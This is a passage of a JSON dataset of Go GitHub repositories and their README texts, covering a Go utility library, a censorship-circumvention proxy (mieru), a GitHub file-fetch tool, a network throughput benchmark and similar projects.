""}, {"name": "sohaha/zlsgo", "link": "https://github.com/sohaha/zlsgo", "tags": ["golang", "go-framework", "web", "cli"], "stars": 505, "description": "\u7b80\u5355\u6613\u7528\u3001\u8db3\u591f\u8f7b\u91cf\u3001\u6027\u80fd\u597d\u7684 Golang \u5e93 - Easy to use, light enough, good performance Golang library", "lang": "Go", "repo_lang": "", "readme": "[English](./README.EN.md) | \u7b80\u4f53\u4e2d\u6587\n\n[![go.dev reference](https://img.shields.io/badge/go.dev-reference-007d9c?logo=go&logoColor=white&style=flat)](https://pkg.go.dev/github.com/sohaha/zlsgo?tab=subdirectories)\n![flat](https://img.shields.io/github/languages/top/sohaha/zlsgo.svg?style=flat)\n[![UnitTest](https://github.com/sohaha/zlsgo/actions/workflows/go.yml/badge.svg)](https://github.com/sohaha/zlsgo/actions/workflows/go.yml)\n[![Go Report Card](https://goreportcard.com/badge/github.com/sohaha/zlsgo)](https://goreportcard.com/report/github.com/sohaha/zlsgo)\n[![codecov](https://codecov.io/gh/sohaha/zlsgo/branch/master/graph/badge.svg)](https://codecov.io/gh/sohaha/zlsgo)\n\n![luckything](https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Fa4bcc6b2-32ef-4a7d-ba1c-65a0330f632d%2Flogo.png?table=block&id=37f366ec-0593-4a21-94c0-c24023a85354&width=590&cache=v2)\n\n## \u6587\u6863\n\n[\u67e5\u770b\u6587\u6863](https://docs.73zls.com/zls-go/#)\n\n\u5efa\u8bae\u642d\u914d [zzz](https://github.com/sohaha/zzz) \u7684 `zzz watch` \u6307\u4ee4\u4f7f\u7528\n\n## \u7279\u6027\n\n\u7b80\u5355\u6613\u7528\u3001\u8db3\u591f\u8f7b\u91cf\uff0c\u907f\u514d\u8fc7\u591a\u7684\u5916\u90e8\u4f9d\u8d56\uff0c\u6700\u4f4e\u517c\u5bb9 Window 7 \u7b49\u8001\u7cfb\u7edf\n\n## \u5feb\u901f\u4e0a\u624b\n\n### \u5b89\u88c5\n\n```bash\n$ go get github.com/sohaha/zlsgo\n```\n\n### HTTP \u670d\u52a1\n\n```go\n// main.go\npackage main\n\nimport (\n \"github.com/sohaha/zlsgo/znet\"\n)\n\nfunc main(){\n // \u83b7\u53d6\u4e00\u4e2a\u5b9e\u4f8b\n r := znet.New()\n\n // \u6ce8\u518c\u8def\u7531\n r.GET(\"/hi\", func(c *znet.Context) {\n c.String(200, \"Hello world\")\n })\n // \u9690\u6027\u8def\u7531\uff08\u7ed3\u6784\u4f53\u7ed1\u5b9a\uff09\u8bf7\u53c2\u8003\u6587\u6863\n // \u542f\u52a8\n znet.Run()\n}\n```\n\n![znet](https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F1d7f2372-5d58-4848-85ca-1bedf8ad14ae%2FUntitled.png?table=block&id=18fdfaa9-5dab-4cb8-abb3-f19ff37ed3f0&width=2210&userId=&cache=v2)\n\n### \u65e5\u5fd7\u5de5\u5177\n\n```go\npackage main\n\nimport (\n \"github.com/sohaha/zlsgo/zlog\"\n)\n\nfunc main(){\n logs := []string{\"\u8fd9\u662f\u4e00\u4e2a\u6d4b\u8bd5\",\"\u8fd9\u662f\u4e00\u4e2a\u9519\u8bef\"}\n zlog.Debug(logs[0])\n zlog.Error(logs[1])\n zlog.Dump(logs)\n // zlog...\n}\n```\n\n![zlog](https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Fd8cc2527-8d9d-466c-b5c8-96e706ee0691%2FUntitled.png?table=block&id=474726aa-05fd-47ba-b270-59017c59817b&width=2560&cache=v2)\n\n### HTTP \u5ba2\u6237\u7aef\n\n```go\n// main.go\npackage main\n\nimport (\n \"github.com/sohaha/zlsgo/zhttp\"\n \"github.com/sohaha/zlsgo/zlog\"\n)\n\nfunc main(){\n data, err := zhttp.Get(\"https://github.com\")\n if err != nil {\n zlog.Error(err)\n return\n }\n res := data.String()\n zlog.Debug(res)\n\n}\n```\n\n### \u66f4\u591a\u529f\u80fd\n\n\u8bf7\u9605\u8bfb\u6587\u6863 [https://docs.73zls.com/zls-go/#](https://docs.73zls.com/zls-go/#)\n\n## Todo\n\n- [x] HTTP \u670d\u52a1\u7aef\n- [x] Http \u5ba2\u6237\u7aef\n- [x] JSON RPC\n- [x] \u65e5\u5fd7\u529f\u80fd\n- [x] Json \u5904\u7406\n- [x] \u5b57\u7b26\u4e32\u5904\u7406\n- [x] \u9a8c\u8bc1\u5668\n- [x] \u70ed\u91cd\u542f\n- [x] \u5b88\u62a4\u8fdb\u7a0b\n- [x] \u5f02\u5e38\u4e0a\u62a5\n- [x] \u7ec8\u7aef\u5e94\u7528\n- [x] \u534f\u7a0b\u6c60\n- [x] HTML \u89e3\u6790\n- [x] \u4f9d\u8d56\u6ce8\u5165\n- [x] Server Sent \u63a8\u9001\n- [ ] [\u6570\u636e\u5e93\u64cd\u4f5c](https://github.com/sohaha/zdb)\n- [ ] ...\n\n## LICENSE\n\n[MIT](LICENSE)", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "networkservicemesh/networkservicemesh", "link": "https://github.com/networkservicemesh/networkservicemesh", "tags": ["networking", "service-mesh", "kubernetes", "cloud-native", "nsm", "cncf"], "stars": 505, "description": "The Hybrid/Multi-cloud IP Service Mesh", "lang": "Go", "repo_lang": "", "readme": "# Archived\n\nThis repo has been archived. Network Service Mesh continues to be [very actively developed](https://networkservicemesh.devstats.cncf.io/d/2/commits-repository-groups?orgId=1&var-period=w&var-repogroups=All&from=now-1y&to=now)\nin [multiple repos](https://networkservicemesh.io/community#developer-resources).\n\n## What is Network Service Mesh\n\nNetwork Service Mesh (NSM) is the Hybrid/Multi-cloud IP Service Mesh.\n\nFor more information, have a look at our [website](https://networkservicemesh.io/)\n\n## Getting started\n\nGet Started with our [latest release](https://networkservicemesh.io/docs/releases/v1.0.0/)\n\n## Docs\n\n[Documentation can be found on our website](https://networkservicemesh.io/docs/concepts/enterprise_users/)\n\n## Get involved\n\nInformation on getting involved: meetings, slack, etc can be found on our [commmunity page](https://networkservicemesh.io/community)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "gansidui/gotcp", "link": "https://github.com/gansidui/gotcp", "tags": [], "stars": 505, "description": "A Go package for quickly building tcp servers", "lang": "Go", "repo_lang": "", "readme": "gotcp\n================\n\nA Go package for quickly building tcp servers\n\n\nUsage\n================\n\n### Install\n\n~~~\ngo get github.com/gansidui/gotcp\n~~~\n\n\n### Examples\n\n* [echo](https://github.com/gansidui/gotcp/tree/master/examples/echo)\n* [telnet](https://github.com/gansidui/gotcp/tree/master/examples/telnet)\n\nDocument\n================\n\n[Doc](http://godoc.org/github.com/gansidui/gotcp)", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "enfein/mieru", "link": "https://github.com/enfein/mieru", "tags": ["network", "tunnel", "proxy", "socks5", "shadowsocks", "v2ray", "trojan"], "stars": 505, "description": "\u898b\u3048\u308b\u662f\u4e00\u6b3e socks5 / HTTP / HTTPS \u7f51\u7edc\u4ee3\u7406\u7ffb\u5899\u5de5\u5177\u3002mieru is a socks5 / HTTP / HTTPS proxy to bypass censorship.", "lang": "Go", "repo_lang": "", "readme": "# \u89c1\u3048\u308b / mieru\n\n[![Build Status](https://github.com/enfein/mieru/actions/workflows/ci.yaml/badge.svg)](https://github.com/enfein/mieru/actions/workflows/ci .yaml)\n[![Releases](https://img.shields.io/github/release/enfein/mieru/all.svg?style=flat)](https://github.com/enfein/mieru/releases)\n[![LICENSE](https://img.shields.io/github/license/enfein/mieru.svg?style=flat)](https://github.com/enfein/mieru/blob/main/LICENSE)\n\nmieru\u3010\u89c1\u3048\u308b\u3011is a safe, non-traffic feature, difficult to detect actively, socks5 / HTTP / HTTPS network proxy software based on TCP or UDP protocol.\n\nThe mieru proxy software consists of two parts: the client software called mieru \u3010\u89c1\u3048\u308b\u3011 and the proxy server software called mita \u3010\u89c1\u305f\u3011.\n\n## Principles and protocols\n\nMieru's over-the-wall principle is similar to software such as shadowsocks / v2ray, and an encrypted channel is established between the client and the proxy server outside the wall. GFW cannot decipher the encrypted transmission information, and cannot determine the URL you finally visit, so you can only choose to let it go.\n\nFor an explanation of the mieru protocol, please refer to [mieru proxy protocol](https://github.com/enfein/mieru/blob/main/docs/protocol.zh_CN.md).\n\n## Features\n\n1. Use high-strength AES-256-GCM encryption algorithm to generate keys based on username, password and system time. With existing computing power, the data content transmitted by mieru cannot be cracked.\n2. mieru realizes the complete encryption of all transmitted content between the client and the proxy server, and does not transmit any plaintext information. A network observer (such as a GFW) can only know the time, the address where the packet was sent and received, and the size of the packet. In addition, observers cannot obtain any other traffic information.\n3. When mieru sends a packet, it will fill with random information at the end. Even if the same content is transmitted, the packet size is different.\n4. When using UDP transmission protocol, mieru can send data directly without handshaking between client and server.\n5. When the server cannot decrypt the data sent by the client, nothing will be returned. It is difficult for GFW to discover mieru services through active probing.\n6. Mieru supports multiple users to share the proxy server.\n7. Mieru supports both IPv4 and IPv6.\n8. mieru provides socks5, HTTP and HTTPS proxy.\n9. The client software supports Windows, Mac OS, Linux and Android systems. Android users please use version 0.8.1-rc02 or above SagerNet client and install version 1.6.1 or above mieru plugin.\n10. If you need advanced functions such as global proxy or custom routing rules, you can use mieru as the backend of proxy platforms such as clash.\n\n## Tutorial\n\n1. [Server installation and configuration](https://github.com/enfein/mieru/blob/main/docs/server-install.zh_CN.md)\n2. [Client installation and configuration](https://github.com/enfein/mieru/blob/main/docs/client-install.zh_CN.md)\n3. [Operation maintenance and troubleshooting](https://github.com/enfein/mieru/blob/main/docs/operation.zh_CN.md)\n4. [Over the wall security guide](https://github.com/enfein/mieru/blob/main/docs/security.zh_CN.md)\n\n## compile\n\nCompile mieru's client and server software, it is recommended to do it on a Linux system. The compilation process may need to download dependent software packages over the wall.\n\nThe software required for compilation includes:\n\n-curl\n-env\n- git\n- go (version >= 1.19)\n- make\n-sha256sum\n-tar\n- zip\n\nCompiling the debian installation package requires:\n\n- dpkg-deb\n-fakeroot\n\nCompiling the RPM installation package requires:\n\n-rpmbuild\n\nWhen compiling, enter the project root directory and call the command `make`. The compilation result will be stored in the `release` folder in the project root directory.\n\n## Contact the author\n\nIf you have any questions about this project, please submit a GitHub Issue to contact us.\n\n## License\n\nmakeUse of this software requires compliance with the GPL-3 agreement.", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "gruntwork-io/fetch", "link": "https://github.com/gruntwork-io/fetch", "tags": ["github", "downloader", "git"], "stars": 504, "description": "Download files, folders, and release assets from a specific git commit, branch, or tag of public and private GitHub repos.", "lang": "Go", "repo_lang": "", "readme": "[![Maintained by Gruntwork.io](https://img.shields.io/badge/maintained%20by-gruntwork.io-%235849a6.svg)](https://gruntwork.io/?ref=repo_fetch)\n# fetch\n\nfetch makes it easy to download files, folders, or release assets from a specific commit, branch, or tag of\na public or private GitHub repo.\n\n#### Motivation\n\n[Gruntwork](http://gruntwork.io) helps software teams get up and running on AWS with DevOps best practices and\nworld-class infrastructure in about a day. Sometimes we publish scripts and binaries that clients use in their\ninfrastructure, and we want an easy way to install a specific version of one of those scripts and binaries. While this\nis fairly straightforward to do with public GitHub repos, as you can usually `curl` or `wget` a public URL, it's much\ntrickier to do with private GitHub repos, as you have to make multiple API calls, parse JSON responses, and handle\nauthentication. Fetch makes it possible to handle all of these cases with a one-liner.\n\n#### Features\n\n- Download from any git reference, such as a specific git tag, branch, or commit SHA.\n- Download a single file, a subset of files, or all files from the repo.\n- Download one or more binary assets from a specific release that match a regular expression.\n- Verify the SHA256 or SHA512 checksum of a binary asset.\n- Download from public repos, or from private repos by specifying a [GitHub Personal Access Token](https://help.github.com/articles/creating-an-access-token-for-command-line-use/).\n- Download from GitHub Enterprise.\n- When specifying a git tag, you can can specify either exactly the tag you want, or a [Tag Constraint Expression](#tag-constraint-expressions) to do things like \"get the latest non-breaking version\" of this repo. Note that fetch assumes git tags are specified according to [Semantic Versioning](http://semver.org/) principles.\n\n#### Quick examples\n\nDownload folder `/baz` from tag `0.1.3` of a GitHub repo and save it to `/tmp/baz`:\n\n```\nfetch --repo=\"https://github.com/foo/bar\" --tag=\"0.1.3\" --source-path=\"/baz\" /tmp/baz\n```\n\nDownload a release asset matching named `foo.exe` from release `0.1.5` and save them to `/tmp`:\n\n```\nfetch --repo=\"https://github.com/foo/bar\" --tag=\"0.1.5\" --release-asset=\"foo.exe\" /tmp\n```\n\nDownload all release assets matching the regular expression, `foo_linux-.*` from release `0.1.5` and save them to `/tmp`:\n\n```\nfetch --repo=\"https://github.com/foo/bar\" --tag=\"0.1.5\" --release-asset=\"foo_linux-.*\" /tmp\n```\n\nSee more examples in the [Examples section](#examples).\n\n## Installation\n\n### Download from releases page\n\nDownload the fetch binary from the [GitHub Releases](https://github.com/gruntwork-io/fetch/releases) tab.\n\n### Install via package manager\n\nNote that package managers are third party. The third party fetch packages may not be updated with the latest version, but are often close. Please check your version against the latest available on the [releases page](https://github.com/gruntwork-io/fetch/releases). If you want the latest version, the recommended installation option is to [download from the releases page](https://github.com/gruntwork-io/fetch/releases).\n\n- **macOS:** You can install fetch using [Homebrew](https://brew.sh/): `brew install fetch`. \n\n- **Linux:** Most Linux users can use [Homebrew](https://docs.brew.sh/Homebrew-on-Linux): `brew install fetch`.\n\n## Usage\n\n#### Assumptions\n\nfetch assumes that a repo's tags are in the format `vX.Y.Z` or `X.Y.Z` to support Semantic Versioning parsing. This allows you to specify a [Tag Constraint Expression](#tag-constraint-expressions) to do things like \"get the latest non-breaking version\" of this repo. Note that fetch also allows downloading a specific tag not in SemVer format.\n\n#### General Usage\n\n```\nfetch [OPTIONS] \n```\n\nThe supported options are:\n\n- `--repo` (**Required**): The fully qualified URL of the GitHub repo to download from (e.g. https://github.com/foo/bar).\n- `--ref` (**Optional**): The git reference to download. If specified, will override `--commit`, `--branch`, and `--tag`.\n- `--tag` (**Optional**): The git tag to download. Can be a specific tag or a [Tag Constraint\n Expression](#tag-constraint-expressions).\n- `--branch` (**Optional**): The git branch from which to download; the latest commit in the branch will be used. If\n specified, will override `--tag`.\n- `--commit` (**Optional**): The SHA of a git commit to download. If specified, will override `--branch` and `--tag`.\n- `--source-path` (**Optional**): The source path to download from the repo (e.g. `--source-path=/folder` will download\n the `/folder` path and all files below it). By default, all files are downloaded from the repo unless `--source-path`\n or `--release-asset` is specified. This option can be specified more than once.\n- `--release-asset` (**Optional**): A regular expression matching release assets--these are binary files uploaded to a [GitHub\n Release](https://help.github.com/articles/creating-releases/)--to download. It only works with the `--tag` option.\n- `--release-asset-checksum` (**Optional**): The checksum that a release asset should have. Fetch will fail if this value\n is non-empty and does not match the checksum computed by Fetch, or if more than 1 assets are matched by the release-asset\n regular expression.\n- `--release-asset-checksum-algo` (**Optional**): The algorithm fetch will use to compute a checksum of the release asset.\n Supported values are `sha256` and `sha512`.\n- `--github-oauth-token` (**Optional**): A [GitHub Personal Access\n Token](https://help.github.com/articles/creating-an-access-token-for-command-line-use/). Required if you're\n downloading from private GitHub repos. **NOTE:** fetch will also look for this token using the `GITHUB_OAUTH_TOKEN`\n environment variable, which we recommend using instead of the command line option to ensure the token doesn't get\n saved in bash history.\n- `--github-api-version` (**Optional**): Used when fetching an artifact from a GitHub Enterprise instance.\n Defaults to `v3`. This is ignored when fetching from GitHub.com.\n- `--progress` (**Optional**): Used when fetching a big file and want to see progress on the fetch.\n\nThe supported arguments are:\n\n- `` (**Required**): The local path where all files should be downloaded (e.g. `/tmp`).\n\nRun `fetch --help` to see more information about the flags.\n\n#### Tag Constraint Expressions\n\nThe value of `--tag` can be expressed using any operators defined in [hashicorp/go-version](https://github.com/hashicorp/go-version).\n\nSpecifically, this includes:\n\n| Tag Constraint Pattern | Meaning |\n| -------------------------- | ---------------------------------------- |\n| `1.0.7` | Exactly version `1.0.7` |\n| `=1.0.7` | Exactly version `1.0.7` |\n| `!=1.0.7` | The latest version as long as that version is not `1.0.7` |\n| `>1.0.7` | The latest version greater than `1.0.7` |\n| `<1.0.7` | The latest version that's less than `1.0.7` |\n| `>=1.0.7` | The latest version greater than or equal to `1.0.7` |\n| `<=1.0.7` | The latest version that's less than or equal to `1.0.7` |\n| `~>1.0.7` | The latest version that is greater than `1.0.7` and less than `1.1.0` |\n| `~>1.0` | The latest version that is greater than `1.0` and less than `2.0` |\n\n## Examples\n\n#### Usage Example 1\n\nDownload `/modules/foo/bar.sh` from a GitHub release where the tag is the latest version of `0.1.x` but at least `0.1.5`, and save it to `/tmp/bar`:\n\n```\nfetch --repo=\"https://github.com/foo/bar\" --tag=\"~>0.1.5\" --source-path=\"/modules/foo/bar.sh\" /tmp/bar\n```\n\n#### Usage Example 2\n\nDownload all files in `/modules/foo` from a GitHub release where the tag is exactly `0.1.5`, and save them to `/tmp`:\n\n```\nfetch --repo=\"https://github.com/foo/bar\" --ref=\"0.1.5\" --source-path=\"/modules/foo\" /tmp\n```\n\n#### Usage Example 3\n\nDownload all files from a private GitHub repo using the GitHUb oAuth Token `123`. Get the release whose tag is exactly `0.1.5`, and save the files to `/tmp`:\n\n```\nGITHUB_OAUTH_TOKEN=123\n\nfetch --repo=\"https://github.com/foo/bar\" --ref=\"0.1.5\" /tmp\n```\n\n#### Usage Example 4\n\nDownload all files from the latest commit on the `sample-branch` branch, and save them to `/tmp`:\n\n```\nfetch --repo=\"https://github.com/foo/bar\" --ref=\"sample-branch\" /tmp/josh1\n```\n\n#### Usage Example 5\n\nDownload all files from the git commit `f32a08313e30f116a1f5617b8b68c11f1c1dbb61`, and save them to `/tmp`:\n\n```\nfetch --repo=\"https://github.com/foo/bar\" --ref=\"f32a08313e30f116a1f5617b8b68c11f1c1dbb61\" /tmp\n```\n\n#### Usage Example 6\n\nDownload the release asset `foo.exe` from a GitHub release where the tag is exactly `0.1.5`, and save it to `/tmp`:\n\n```\nfetch --repo=\"https://github.com/foo/bar\" --ref=\"0.1.5\" --release-asset=\"foo.exe\" /tmp\n```\n\n#### Usage Example 7\n\nDownload the release asset `foo.exe` from a GitHub release hosted on a GitHub Enterprise instance running at `ghe.mycompany.com` where the tag is exactly `0.1.5`, and save it to `/tmp`:\n\n```\nfetch --repo=\"https://ghe.mycompany.com/foo/bar\" --ref=\"0.1.5\" --release-asset=\"foo.exe\" /tmp\n```\n\n##### Release Instructions\n\nTo release a new version of `fetch`, go to the [Releases page](https://github.com/gruntwork-io/fetch/releases) and \"Draft a new release\".\nOn the following page, bump the \"Tag version\" appropriately, and set the \"Release title\" to be the same.\nIn the \"Describe this release\" section, log the changes of this release, linking back to issues that were addressed.\nClick the \"Publish release\" button. CircleCI will pick this up, generate the assets, and attach them to the release.\n\n## License\n\nThis code is released under the MIT License. See [LICENSE.txt](/LICENSE.txt).\n\n## TODO\n\n- Introduce code verification using something like GPG signatures or published checksums\n- Explicitly test for exotic repo and org names\n- Apply stricter parsing for repo-filter command-line arg", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "udhos/goben", "link": "https://github.com/udhos/goben", "tags": ["golang", "go", "networking", "benchmarking", "tool", "tcp", "performance-testing", "udp", "bandwidth", "measure-tcp-throughput", "throughput"], "stars": 504, "description": "goben is a golang tool to measure TCP/UDP transport layer throughput between hosts.", "lang": "Go", "repo_lang": "", "readme": "[![license](http://img.shields.io/badge/license-MIT-blue.svg)](https://github.com/udhos/goben/blob/master/LICENSE)\n[![Go Report Card](https://goreportcard.com/badge/github.com/udhos/goben)](https://goreportcard.com/report/github.com/udhos/goben)\n[![GolangCI](https://golangci.com/badges/github.com/udhos/goben.svg)](https://golangci.com/r/github.com/udhos/goben)\n\n# goben\n\ngoben is a golang tool to measure TCP/UDP transport layer throughput between hosts.\n\n* [Features](#features)\n* [History](#history)\n* [Requirements](#requirements)\n* [Install](#install)\n * [With Go Modules (since Go 1\\.11)](#with-go-modules-since-go-111)\n * [Without Go Modules (before Go 1\\.11)](#without-go-modules-before-go-111)\n* [Usage](#usage)\n* [Command\\-line Options](#command-line-options)\n* [Example](#example)\n* [TLS](#tls)\n\nCreated by [gh-md-toc](https://github.com/ekalinin/github-markdown-toc.go)\n\n# Features\n\n- Support for TCP, UDP, TLS.\n- Can limit maximum bandwidth.\n- Written in [Go](https://golang.org/). Single executable file. No runtime dependency.\n- Simple usage: start the server then launch the client pointing to server's address.\n- Spawns multiple concurrent lightweight goroutines to handle multiple parallel traffic streams.\n- Can save test results as PNG chart.\n- Can export test results as YAML or CSV.\n\n# History\n\n- Years ago out of frustration with [iperf2](https://sourceforge.net/projects/iperf2/) limitations, I wrote the [nepim](http://www.nongnu.org/nepim/) tool. One can find some known iperf problems here: [iperf caveats](https://support.cumulusnetworks.com/hc/en-us/articles/216509388-Throughput-Testing-and-Troubleshooting#network_testing_with_open_source_tools). Nepim was more customizable, easier to use, reported simpler to understand results, was lighter on CPU.\n- Later I found another amazing tool called [nuttcp](https://www.nuttcp.net/). One can read about nepim and nuttcp here: [nepim and nuttcp](https://www.linux.com/news/benchmarking-network-performance-network-pipemeter-lmbench-and-nuttcp).\n- [goben](https://github.com/udhos/goben) is intended to fix shortcomings of nepim: (1) Take advantage of multiple CPUs while not wasting processing power. Nepim was single-threaded. (2) Be easily portable to multiple platforms. Nepim was heavily tied to UNIX-like world. (3) Use a simpler synchronous code flow. Nepim used hard-to-follow asynchronous architecture.\n\n# Requirements\n\n- You need a [system with the Go language](https://golang.org/dl/) in order to build the application. There is no special requirement for running it.\n- You can also download a binary release from https://github.com/udhos/goben/releases\n\n# Install\n\n## With Go Modules (since Go 1.11)\n\n git clone https://github.com/udhos/goben ;# clone outside GOPATH\n cd goben\n go test ./goben\n CGO_ENABLED=0 go install ./goben\n\n## Without Go Modules (before Go 1.11)\n\n go get github.com/wcharczuk/go-chart\n go get gopkg.in/yaml.v2\n go get github.com/udhos/goben\n go install github.com/udhos/goben/goben\n\n# Usage\n\nMake sure ~/go/bin is in your shell PATH.\n\nStart server:\n\n server$ goben\n\nStart client:\n\n client$ goben -hosts 1.1.1.1 ;# 1.1.1.1 is server's address\n\n# Command-line Options\n\nFind several supported command-line switches by running 'goben -h':\n\n```\n$ goben -h\n2021/02/28 00:43:28 goben version 0.6 runtime go1.16 GOMAXPROCS=12 OS=linux arch=amd64\nUsage of goben:\n -ascii\n plot ascii chart (default true)\n -cert string\n TLS cert file (default \"cert.pem\")\n -chart string\n output filename for rendering chart on client\n '%d' is parallel connection index to host\n '%s' is hostname:port\n example: -chart chart-%d-%s.png\n -connections int\n number of parallel connections (default 1)\n -csv string\n output filename for CSV exporting test results on client\n '%d' is parallel connection index to host\n '%s' is hostname:port\n example: -csv export-%d-%s.csv\n -defaultPort string\n default port (default \":8080\")\n -export string\n output filename for YAML exporting test results on client\n '%d' is parallel connection index to host\n '%s' is hostname:port\n example: -export export-%d-%s.yaml\n -hosts value\n comma-separated list of hosts\n you may append an optional port to every host: host[:port]\n -key string\n TLS key file (default \"key.pem\")\n -listeners value\n comma-separated list of listen addresses\n you may prepend an optional host to every port: [host]:port\n -localAddr string\n bind specific local address:port\n example: -localAddr 127.0.0.1:2000\n -maxSpeed float\n bandwidth limit in mbps (0 means unlimited)\n -passiveClient\n suppress client writes\n -passiveServer\n suppress server writes\n -reportInterval string\n periodic report interval\n unspecified time unit defaults to second (default \"2s\")\n -tcpReadSize int\n TCP read buffer size in bytes (default 1000000)\n -tcpWriteSize int\n TCP write buffer size in bytes (default 1000000)\n -tls\n set to false to disable TLS (default true)\n -totalDuration string\n test total duration\n unspecified time unit defaults to second (default \"10s\")\n -udp\n run client in UDP mode\n -udpReadSize int\n UDP read buffer size in bytes (default 64000)\n -udpWriteSize int\n UDP write buffer size in bytes (default 64000)\n```\n\n# Example\n\nServer side:\n\n $ goben\n 2018/06/28 15:04:26 goben version 0.3 runtime go1.11beta1 GOMAXPROCS=1\n 2018/06/28 15:04:26 connections=1 defaultPort=:8080 listeners=[\":8080\"] hosts=[]\n 2018/06/28 15:04:26 reportInterval=2s totalDuration=10s\n 2018/06/28 15:04:26 server mode (use -hosts to switch to client mode)\n 2018/06/28 15:04:26 serve: spawning TCP listener: :8080\n 2018/06/28 15:04:26 serve: spawning UDP listener: :8080\n\nClient side:\n\n $ goben -hosts localhost\n 2018/06/28 15:04:28 goben version 0.3 runtime go1.11beta1 GOMAXPROCS=1\n 2018/06/28 15:04:28 connections=1 defaultPort=:8080 listeners=[\":8080\"] hosts=[\"localhost\"]\n 2018/06/28 15:04:28 reportInterval=2s totalDuration=10s\n 2018/06/28 15:04:28 client mode, tcp protocol\n 2018/06/28 15:04:28 open: opening tcp 0/1: localhost:8080\n 2018/06/28 15:04:28 handleConnectionClient: starting 0/1 [::1]:8080\n 2018/06/28 15:04:28 handleConnectionClient: options sent: {2s 10s 50000 50000 false 0}\n 2018/06/28 15:04:28 clientReader: starting: 0/1 [::1]:8080\n 2018/06/28 15:04:28 clientWriter: starting: 0/1 [::1]:8080\n 2018/06/28 15:04:30 0/1 report clientReader rate: 13917 Mbps 34793 rcv/s\n 2018/06/28 15:04:30 0/1 report clientWriter rate: 13468 Mbps 33670 snd/s\n 2018/06/28 15:04:32 0/1 report clientReader rate: 14044 Mbps 35111 rcv/s\n 2018/06/28 15:04:32 0/1 report clientWriter rate: 13591 Mbps 33978 snd/s\n 2018/06/28 15:04:34 0/1 report clientReader rate: 12934 Mbps 32337 rcv/s\n 2018/06/28 15:04:34 0/1 report clientWriter rate: 12517 Mbps 31294 snd/s\n 2018/06/28 15:04:36 0/1 report clientReader rate: 13307 Mbps 33269 rcv/s\n 2018/06/28 15:04:36 0/1 report clientWriter rate: 12878 Mbps 32196 snd/s\n 2018/06/28 15:04:38 0/1 report clientWriter rate: 13330 Mbps 33325 snd/s\n 2018/06/28 15:04:38 0/1 report clientReader rate: 13774 Mbps 34436 rcv/s\n 2018/06/28 15:04:38 handleConnectionClient: 10s timer\n 2018/06/28 15:04:38 workLoop: 0/1 clientWriter: write tcp [::1]:42130->[::1]:8080: use of closed network connection\n 2018/06/28 15:04:38 0/1 average clientWriter rate: 13157 Mbps 32892 snd/s\n 2018/06/28 15:04:38 clientWriter: exiting: 0/1 [::1]:8080\n 2018/06/28 15:04:38 workLoop: 0/1 clientReader: read tcp [::1]:42130->[::1]:8080: use of closed network connection\n 2018/06/28 15:04:38 0/1 average clientReader rate: 13595 Mbps 33989 rcv/s\n 2018/06/28 15:04:38 clientReader: exiting: 0/1 [::1]:8080\n 2018/06/28 15:04:38 input:\n 14038 \u2524 \u256d\u2500\u2500\u2500\u2500\u256e\n 13939 \u2524\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u256f \u2570\u256e\n 13840 \u253c \u2570\u2500\u256e\n 13741 \u2524 \u2570\u256e \u256d\u2500\u2500\n 13641 \u2524 \u2570\u256e \u256d\u2500\u2500\u2500\u256f\n 13542 \u2524 \u2570\u2500\u256e \u256d\u2500\u2500\u256f\n 13443 \u2524 \u2570\u256e \u256d\u2500\u2500\u2500\u256f\n 13344 \u2524 \u2570\u2500\u256e \u256d\u2500\u2500\u2500\u256f\n 13245 \u2524 \u2570\u256e \u256d\u2500\u2500\u2500\u256f\n 13146 \u2524 \u2570\u2500\u256e \u256d\u2500\u2500\u2500\u256f\n 13047 \u2524 \u2570\u2500\u2500\u2500\u2500\u256f\n 12948 \u2524\n 2018/06/28 15:04:38 output:\n 13585 \u2524 \u256d\u2500\u2500\u2500\u2500\u256e\n 13489 \u2524\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u256f \u2570\u256e\n 13393 \u253c \u2570\u2500\u256e\n 13297 \u2524 \u2570\u256e \u256d\u2500\u2500\n 13201 \u2524 \u2570\u256e \u256d\u2500\u2500\u2500\u256f\n 13105 \u2524 \u2570\u2500\u256e \u256d\u2500\u2500\u256f\n 13009 \u2524 \u2570\u256e \u256d\u2500\u2500\u2500\u256f\n 12914 \u2524 \u2570\u2500\u256e \u256d\u2500\u2500\u2500\u256f\n 12818 \u2524 \u2570\u256e \u256d\u2500\u2500\u2500\u256f\n 12722 \u2524 \u2570\u2500\u256e \u256d\u2500\u2500\u2500\u256f\n 12626 \u2524 \u2570\u2500\u2500\u2500\u2500\u256f\n 12530 \u2524\n 2018/06/28 15:04:38 handleConnectionClient: closing: 0/1 [::1]:8080\n\n# TLS\n\nFor TLS, a server-side certificate is required:\n\n $ openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout key.pem -out cert.pem\n\nIf the certificate is available, goben server listens on TLS socket. Otherwise, it falls back to plain TCP.\n\n--x--\n\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "Echosong/beego_blog", "link": "https://github.com/Echosong/beego_blog", "tags": ["golang", "layui", "beego", "blog"], "stars": 504, "description": " beego+layui go\u5165\u95e8\u5f00\u53d1 \u7b80\u6d01\u7f8e\u89c2\u7684\u4e2a\u4eba\u535a\u5ba2\u7cfb\u7edf", "lang": "Go", "repo_lang": "", "readme": "# beego_Blog\n\n\u57fa\u4e8eGo\u8bed\u8a00\u548cbeego\u6846\u67b6 \u524d\u7aef\u4f7f\u7528layui \u5e03\u5c40 \u5f00\u53d1\u7684\u4e2a\u4eba\u535a\u5ba2\u7cfb\u7edf\n\ncms 